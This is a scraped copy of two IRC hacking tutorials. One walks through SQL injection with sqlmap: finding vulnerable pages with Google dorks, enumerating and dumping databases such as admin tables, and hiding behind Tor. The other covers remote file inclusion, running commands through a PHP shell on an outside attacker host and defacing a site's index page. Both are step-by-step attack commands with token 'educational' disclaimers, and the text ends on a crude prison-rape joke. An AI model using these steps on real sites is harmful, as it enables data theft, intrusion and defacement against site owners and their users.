Sie sind auf Seite 1von 3

https://docs.google.com/document/d/1u9tNpa4zDt2znAXKAB3o3rjrZbwYlXXwYQT0EJixTRU/ edit?pli=1 bnon> This tutorial is automated and there is no human to respond.

Questions af ter the presentation should be asked in #Tutorials. This presentation will last a few minutes. <bnon> This tutorial is for educational purposes only. This information is not intended to aid in any form of illegal activity. <bnon> SQLMAP For Dummies v1.0 - By Matrix <bnon> Required for use: Backtrack5 R1. <bnon> Start your Backtrack5 R1 (BT5) and start sqlmap, it can be found in /pent est/database/sqlmap/. <bnon> Now lets get started! <bnon> First we need a webpage, this normally is done by hand or by using dorks in google. To find out if a page is vulnerable to an injection we do this: <bnon> http://localhost.com/index.php?id=1337' <bnon> Notice the ' here: ^ <bnon> This should give you a pretty error and a good start! <bnon> Lets open sqlmap! <bnon> So the first you need to learn is options, or settings you have to apply in sqlmap. The base is: <bnon> python sqlmap.py -u <website> <bnon> With a website we would simply do it like this <bnon> python sqlmap.py -u http://localhost/index.php?id=1337 <bnon> (note we did not add the ' here) <bnon> -u stands for Url and tells sqlmap THIS is our url. But we have to add mo re options for sqlmap to work: <bnon> --dbs to find DataBases <bnon> --users to find users. <bnon> python sqlmap.py -u http://localhost/index.php?id=1337 --dbs (and/or) --u sers <bnon> After this command is ran you should come up with 0 results, or some resu lts. If you read the text you might be able to find some databases, and if you d o. Congratz! <bnon> available databases [2]: <bnon> [*] database1 <bnon> [*] database2 <bnon> Now to the fun part! <bnon> python sqlmap.py -u http://localhost/index.php?id=1337 --tables -D databa se1 <bnon> This tells the program to find tables (--tables) in database (-D) names: database1. <bnon> python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T ad min <bnon> Now you should see the info of the table admin. But now we should be able to dump it! This can be done by --dump or --dump-all. <bnon> python sqlmap.py -u http://localhost/index.php?id=1337 --tables -D databa se1 --dump-all <bnon> python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T ad min --dump <bnon> --dump dumps the selected tables content, --dump-all dumps EVERYTHING! <bnon> Tor with SQLMAP: <bnon> First find /etc/apt/sources.list open it and add <bnon> deb http://deb.torproject.org/torproject.org lucid main <bnon> Open the terminal and use this commandoes: <bnon> gpg --keyserver keys.gnupg.net --recv 886DDD89 <bnon> gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -

<bnon> And now we need more commandos ran as root: <bnon> apt-get update <bnon> apt-get install tor tor-geoipdb <bnon> apt-get install polipo <bnon> Start tor: /etc/init.d/tor start grab the copy of this config file: https ://gitweb.torproject.org/torbrowser.git/blob_plain/HEAD:/build-scripts/config/po lipo.conf <bnon> Go to /etc/polipoconfig and replce the file with the one above. restart p olipo: /etc/init.d/polipo restart <bnon> python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T ad min --dump --tor --random-agent <bnon> Happy safe hacking! ... and <bnon> I hope you found this tutorial helpful. We encourage you to experience o ther tutorials and get the best possible education you can. bnon> This tutorial is for educational purposes only. This information is not i ntended to aid in any form of illegal activity. <bnon> Remote File Inclusion - Created by Nexus - For more tutorials visit the # tutorials channel. <bnon> Section 1 - What is RFI? <bnon> RFI stands for Remote File Inclusion, it is found where a site is told to look to a directory on the server. <bnon> Properly coded sites will not allow other sites to act as directories, if you don't understand, you'll see an example later on. <bnon> Section 2 - Locating the target <bnon> So you can pretty much find an RFI Vuln site by just using some Google do rks or testing a site you already have. <bnon> Im just going to use the domain name 'Example.com'. <bnon> So I have my target, to see if its vulnerable, we can test with our frien d Google.com :). So you type http://example.com/index.php?page=google.com/ <bnon> and if you get a redirect to google.com, then you have a vulnerable site :). <bnon> Section 3 - Exploiting the target <bnon> So now we know that example.com is vulnerable, we can do some Remote Expl oiting:). <bnon> Your gonna need somewhere to host in order to do this, seeing as its REMO TE File Inclusion ;) your also gonna need a shell. You could use the infamous c9 9.php shell, but that makes a mess of system logs, and is easy to find. So im go nna give you a basic one to make with instructions. <bnon> 1) Open your favourite file editor. <bnon> <?php <bnon> 3) Save the file as shell.php and make sure its All Files and not a .txt file. <bnon> Now we can send a few commands to this server :) <bnon> To send commands we can do 'ls' without the quotes for example, prosuming this is a linux server, if its windows based, use dir, etc etc. <bnon> So im just going to take a peak inside by using http://example.com/index. php?cmd=ls&page=http://hackersite.com/shell.php <bnon> That will send our command to the server, and it will start to list the d ocuments, with this we can do much more than ls and do for example: <bnon> http://example.com/index.php?cmd=echo You just got OWNED! > index.php&pag e=http://hackersite.com/shell.php <bnon> Section 4 - Signing off <bnon> And thats my basic tutorial for RFI, i hoped you liked it, and if you don t, please tweet to @OpticalForce why you don't :) <bnon> ***These acts of hacking are classed as illegal under many countries, doi ng so could get you Arrested, raided or even buttraped during your prison senten ce, we do not cover anal rape on our Insurance policy and you may or may not be fined a large amount o